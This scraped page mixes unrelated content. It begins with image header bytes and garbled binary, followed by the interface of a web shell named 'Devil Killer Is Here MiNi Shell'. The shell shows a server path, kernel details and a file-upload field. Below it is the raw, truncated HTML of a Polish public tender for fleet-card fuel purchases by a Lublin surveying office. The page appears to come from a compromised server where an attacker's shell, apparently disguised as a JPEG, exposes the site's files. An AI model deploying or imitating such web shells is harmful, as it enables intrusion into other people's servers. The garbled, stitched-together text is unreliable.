JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241009/0053855301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup paliw płynnych, akcesoriów samochodowych i mycie pojazdów w systemie kart flotowych - bezgotówkowych w okresie od 01.01.2025 r. do 31.12.2025 r. na potrzeby WBGiUTR w Lublinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKIE BIURO GEODEZJI I URZĄDZANIA TERENÓW ROLNYCH W LUBLINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060659264</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bursaki 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-150</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 532 83 52</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wbglubelskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wbglubelskie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność w zakresie inżynierii i związane z nią doradztwo techniczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup paliw płynnych, akcesoriów samochodowych i mycie pojazdów w systemie kart flotowych - bezgotówkowych w okresie od 01.01.2025 r. do 31.12.2025 r. na potrzeby WBGiUTR w Lublinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d0dd95fb-093f-475a-92b2-41711e020958</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00538553</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00076696/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup paliw płynnych, akcesoriów samochodowych i mycie pojazdów w systemie kart flotowych - bezgotówkowych w okresie od 01.01.2025 r. do 31.12.2025 r. na potrzeby WBGiUTR w Lublinie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d0dd95fb-093f-475a-92b2-41711e020958 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych na Platformie e-Zamówienia w zakładce „Formularze”<br/>(„Formularze do komunikacji”).<br/><br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: sekretariat@wbglubelskie.pl<br/>(nie dotyczy składania ofert z załącznikami). Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia<br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”.<br/><br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Portal e-Zamówienia. Identyfikator<br/>postępowania o udzielenie zamówienia oraz numer ogłoszenia BZP dostępny jest na Platformie e-Zamówienia w szczegółach<br/>postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE.<br/>2016 L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Wojewódzkie Biura Geodezji i Urządzania Terenów Rolnych w Lublinie ul.<br/>Bursaki 17, 20-150 Lublin.<br/>Kontakt:<br/>- listowny: ul. Bursaki 17, 20-150 Lublin<br/>- telefoniczny: 81 532 83 52<br/>- e-mail: sekretariat@wbglubelskie.pl<br/>Dyrektor Wojewódzkiego Biura Geodezji i Urządzania Terenów Rolnych powołał Inspektora Ochrony Danych Osobowych<br/>Kontakt:<br/>- listowny: ul. Bursaki 17, 20-150 Lublin<br/>- telefoniczny: 510 374 921<br/>- e-mail: inspektor@wbglubelskie.pl<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego dot. zakupu paliw płynnych, akcesoriów samochodowych i mycie pojazdów<br/>w systemie kart flotowych - bezgotówkowych w okresie od 01.01.2025 r. do 31.12.2025 r. na potrzeby Wojewódzkiego Biura<br/>Geodezji i Urządzania Terenów Rolnych w Lublinie, oznaczenie sprawy NAG.263.1.2024, prowadzonym w trybie podstawowym bez<br/>możliwości negocjacji;<br/>3. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74-79 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz.U. z 2024 r. poz. 1320),zwanej dalej „ustawą Pzp”;<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/>5. Po upływie okresu określonego w pkt 4 dane osobowe będą przechowywane przez okres archiwalny, zgodnie z wymaganiami<br/>prawnymi określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz.U. z 2011<br/>Nr 14, poz. 67 ze zm.)<br/>6. Dane będą przetwarzane wyłącznie w celu:<br/>1) niezbędnym do zawarcia i wykonania umowy, jej rozliczenia, w tym przechowywania faktur i dokumentów księgowych,<br/>2) dochodzenia roszczeń,<br/>3) archiwalnym i nie będą udostępniane odbiorcom danych za wyjątkiem podmiotów, które są upoważnione na podstawie przepisów<br/>prawa.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO;<br/>9. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NAG.263.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 196186,27 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup wraz z zapewnieniem zatankowania bezpośrednio do zbiorników samochodów będących w dyspozycji Zamawiającego oraz kanistrów dla potrzeb urządzeń mechanicznych jak: kosiarki, piły spalinowe, wiertnice glebowe itp., w okresie od dnia 01.01.2025 r. do dnia 31.12.2025 r. następujących paliw:<br/>1)	benzyny bezołowiowej 98 zgodnej z normą PN–EN 228, nomenklatura wg. CPV 09132100-4,<br/>2)	benzyny bezołowiowej 95 zgodnej z normą PN–EN 228, nomenklatura wg. CPV 09132100-4,<br/>3)	oleju napędowego zgodnego z normą PN – EN 590, nomenklatura wg. CPV 09134100-8,<br/>4)	gazu propan-butan (LPG) zgodnego z normą PN - EN 589, nomenklatura wg. CPV 09122000-0,<br/>oraz zakup akcesoriów samochodowych zgodnie z przyznanym limitem na daną kartę do <br/>25 000 zł łącznie na wszystkie karty flotowe typu:<br/>- nomenklatura wg. CPV 09211100-2 (olej silnikowy)<br/>- nomenklatura wg. CPV 24322320-6 (płyn do spryskiwaczy) <br/>- nomenklatura wg. CPV 24957000-7 (dodatki do paliwa).<br/>- nomenklatura wg. CPV 50112300-6 (mycie pojazdów)<br/><br/>Paliwa stanowiące przedmiot zamówienia powinny spełniać wymagania jakościowe zawarte w ustawie z dnia 25 sierpnia 2006 r. o systemie monitorowania i kontrolowania jakości paliw (t.j. Dz.U. z 2024 r. poz. 1209) rozporządzeniu Ministra Klimatu i Środowiska w sprawie wymagań jakościowych dla paliw ciekłych z dnia 26 czerwca 2024 r. (t.j. Dz.U. z 2024 r. poz. 1018), rozporządzeniu Ministra Klimatu i Środowiska w sprawie wymagań jakościowych dla gazu skroplonego (LPG) z dnia 28 maja 2021 r. (t.j. Dz.U. z 2024 r. poz. 744) oraz innych stosownych przepisach prawa i normach jakościowych.<br/><br/>2.	Dopuszcza się oferowanie paliwa równoważnego do paliwa opisanego w/w normami.<br/><br/>3.	Zamawiający wymaga, aby ilości stacji paliw na terenie całego kraju, w których można realizować zamówienie wynosiła nie mniej niż 150 stacji.<br/><br/>4.	Zamawiający wymaga, aby w każdym z niżej wymienionych miast (siedziba Zamawiającego oraz jego Pracownie Terenowe) tj. Lublin, Biała Podlaska, Chełm i Zamość znajdowała się co najmniej jedna stacja paliw, w której możliwe jest zatankowanie samochodów całodobowo. W przypadku ewentualnej modernizacji lub wyłączenia ze sprzedaży danej stacji Wykonawca zapewni możliwość dokonywania transakcji na innej stacji paliw Wykonawcy położonej najbliżej siedziby stacji wyłączonej lub modernizowanej.<br/><br/>5.	W ramach przedmiotu zamówienia Wykonawca wyda 26 kart flotowych przypisanych do pojazdów objętych przedmiotem zamówienia (numery rejestracyjne pojazdów zostaną podane w załączniku do podpisywanej umowy) oraz 8 kart flotowych uniwersalnych umożliwiających tankowanie paliw do pojazdów wymienionych w załączniku do umowy i kanistrów dla potrzeb urządzeń mechanicznych (kosiarki, piły, itp.).<br/><br/>6.	Jeżeli Zamawiający posiada karty flotowe Wykonawcy wyłonionego w postępowaniu to nie zachodzi konieczność wydawania nowych kart.<br/><br/>7.	Zamawiający zastrzega możliwość zwiększenia kart flotowych w razie zwiększenia liczby eksploatowanych pojazdów lub zwrotu kart flotowych w razie wycofania poszczególnych pojazdów z eksploatacji.<br/><br/>8.	Karty flotowe powinny zawierać zakodowane informacje:<br/>1)	Pojazdy mechaniczne 26 sztuk: - nazwę Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie - nr rejestracyjny pojazdu, do którego przypisana jest karta,<br/>2)	Karta uniwersalna - 4 sztuki: - nazwa Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie – Centrala,<br/>3)	Karta Uniwersalna - 1 sztuka: - nazwa Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie - Pracownia w Zamościu,<br/>4)	Karta Uniwersalna - 1 sztuka: - nazwa Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie - Pracownia w Białej Podlaskiej,<br/>5) Karta Uniwersalna - 1 sztuka: - nazwa Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie - Pracownia w Chełmie,<br/>6)	Karta Uniwersalna - 1 sztuka: - nazwa Zamawiającego tj. Wojewódzkie Biuro Geodezji i Urządzania Terenów Rolnych w Lublinie - Pracownia w Lublinie.<br/>9. Zamawiający informacyjnie podaje, iż zakupy paliwa w okresie od 17.09.2023 r. – 17.09.2024 r. wyniosły: <br/>1)	benzyny bezołowiowej 95 – 4499,76 litrów,<br/>2)	benzyny bezołowiowej 98 – 0 litrów<br/>3)	oleju napędowego - 8715,97 litrów,<br/>4)	oleju napędowego VERVA - 119,74 litrów,<br/>	3) gazu LPG – 3783,98 litrów<br/>10.	Przewidywane zakupy paliwa na rok 2024 mogą wynieść:<br/>1)	benzyny bezołowiowej 95 - 14 000 litrów,<br/>2)	benzyny bezołowiowej 98 – 500 litrów,<br/>3)	oleju napędowego – 14 000 litrów,<br/>4)	gazu propan butan (LPG) – 8000 litrów.<br/><br/>Zamawiający zastrzega sobie możliwość zakupu mniejszych ilości paliw określonych powyżej jednak nie mniej niż za 30% maksymalnej wartości umowy obejmującej także limit na zakup akcesoriów samochodowych typu oleje silnikowe, płyny do spryskiwaczy i inne oraz mycie pojazdów w wysokości 25 000 zł brutto łącznie na wszystkie karty flotowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09132100-4 - Benzyna bezołowiowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09134100-8 - Olej napędowy</p> <p class="mb-0">09122000-0 - Propan i butan</p> <p class="mb-0">09211100-2 - Oleje silnikowe</p> <p class="mb-0">24322320-6 - Pochodne alkoholi</p> <p class="mb-0">24957000-7 - Dodatki chemiczne</p> <p class="mb-0">50112300-6 - Mycie samochodów i podobne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość zakupu mniejszych ilości paliw określonych powyżej jednak nie mniej niż za 30% maksymalnej wartości umowy obejmującej także limit na zakup akcesoriów samochodowych typu oleje silnikowe, płyny do spryskiwaczy i inne oraz mycie pojazdów w wysokości 25 000 zł brutto łącznie na wszystkie karty flotowe. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1)	C - cena brutto paliwa ogółem po zastosowaniu rabatu wraz z limitem na zakup akcesoriów samochodowych typu oleje silnikowe, płyny do spryskiwaczy i inne oraz mycia pojazdów – waga 60%<br/>2)	R - zastosowany rabat na paliwo do ceny w dniu zakupu – waga 3%<br/>3)	T - termin płatności za paliwo – waga 1%<br/>4)	S - ilość stacji paliw w województwie lubelskim – waga 36%<br/><br/>2.	Maksymalna ilość punktów w ramach kryterium oceny jest równa określonej wadze kryterium w %.<br/>3.	Szczegółowe zasady oceny ofert wg kryteriów wskazanych w pkt. 1: <br/>Łączna ocena punktowa Z wg wzoru:<br/>Z = liczba punktów za C + liczba punktów za R + liczba punktów za T + liczba punktów za S<br/>Lp. Kryterium waga <br/>1 C – cena brutto paliwa ogółem po zastosowaniu rabatu wraz z limitem na zakup akcesoriów samochodowych typu oleje silnikowe, płyny do spryskiwaczy i inne oraz mycia pojazdów 60 % <br/>2 R – zastosowany rabat na paliwo do ceny w dniu zakupu	3 % <br/>3	T – termin płatności za paliwo (nie krótszy niż 14 dni i nie dłuższy 30 dni)	1%<br/>4	S – ilość stacji paliw w województwie lubelskim	36%<br/> SUMA PUNKTACJI Z = (1+2+3+4) 100 % (1%=1 pkt)<br/> <br/>C – oferowana najniższa cena brutto paliwa ogółem po zastosowaniu rabatu wraz z limitem na zakup akcesoriów samochodowych typu oleje silnikowe, płyny do spryskiwaczy i inne oraz mycia pojazdów, oceniana będzie punktowo, liczba punktów w powyższym kryterium będzie liczona wg poniższego wzoru:<br/>Cena brutto ogółem, po zastosowaniu rabatu paliwa, <br/>oferty zawierającej najniższą cenę<br/>Liczba punktów za C = ---------------------------------------------------------------------------- x 60 =<br/>Cena brutto ogółem po zastosowaniu rabatu <br/>paliwa oferty badanej<br/><br/>R – zastosowany rabat na paliwo ogółem oceniany będzie punktowo, liczba punktów w powyższym kryterium będzie liczona według poniższego wzoru: <br/><br/>Rabat w groszach oferowany w danej ofercie<br/>Liczba punktów za R = ---------------------------------------------------------------------------- x 3 =<br/>Najwyższy rabat w groszach z wszystkich złożonych ofert<br/> <br/>T – termin płatności za paliwo będzie oceniany punktowo, liczba punktów w powyższym kryterium będzie liczona według poniższego wzoru: <br/><br/>Termin płatności za paliwo oferowany w badanej ofercie<br/>Liczba punktów za T = ---------------------------------------------------------------------------- x 1 =<br/>Termin płatności za paliwo zawarty w ofercie zawierającej<br/> najdłuższy termin płatności<br/><br/>Oferowany termin płatności za paliwo nie może być krótszy niż 14 dni ani dłuższy niż 30 dni. W przypadku zaoferowania terminu płatności krótszego niż 14 dni i dłuższego niż 30 dni oferta zostanie odrzucona, jako niezgodna z warunkami zamówienia określonymi w SWZ wraz z załącznikami.<br/><br/><br/>S – ilość stacji paliw będzie oceniana punktowo, liczba punktów w powyższym kryterium będzie liczona według poniższego wzoru:<br/><br/>Ilość stacji paliw w województwie lubelskim w badanej ofercie<br/>Liczba punktów za S = --------------------------------------------------------------------------- X 36 =<br/>Ilość stacji paliw w woj. lubelskim w ofercie <br/>z największą liczbą stacji paliw w woj. lubelskim<br/><br/>Za najkorzystniejszą zostanie uznana oferta która uzyska największą liczbę punktów <br/>z końcowej oceny ofert liczonych wg wzoru: <br/> <br/>Z = C+R+T+S</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 